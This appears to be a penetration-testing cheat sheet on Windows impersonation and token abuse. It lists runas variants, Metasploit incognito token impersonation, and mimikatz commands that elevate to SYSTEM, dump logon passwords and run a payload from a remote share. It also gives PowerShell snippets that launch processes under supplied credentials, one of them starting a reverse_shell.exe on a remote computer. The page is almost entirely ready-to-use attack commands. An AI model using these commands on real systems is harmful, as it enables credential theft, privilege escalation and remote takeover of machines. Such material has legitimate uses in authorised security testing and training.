Impersonation and Tokens

Run as

runas /u:<user> cmd.exe
runas /netonly /user:<dom>\<user> cmd.exe
runas /noprofile /user:<dom>\<user> cmd.exe
runas /profile /env /user:<domain>\<user> <"%windir%\system32\script.bat">

info

The following command should work in a Citrix session with published applications. A GUI is needed to fill the credentials.

Start-Process Powershell -Verb RunAs

Tokens

load incognito
list_token -u
list token -g
impersonate_token <toto.in>\\<Administrator> (escape '\')

mimikatz token::elevate /system
mimikatz !token::whoami
mimikatz !sekurlsa::logonpasswords
mimikatz !token::run "\\<remote_share>\<share>\<payload.exe>"

Windows sudo with Powershell

$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'

$secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
[System.Diagnostics.Process]::Start("<C:/users/public/reverse_shell.exe>","", $mycreds.Username, mycreds.Password, $computer)

powershell -ExecutionPolicy Bypass -File sudo.ps1

Run as​

Tokens​

Windows sudo with Powershell​

Run as

Tokens

Windows sudo with Powershell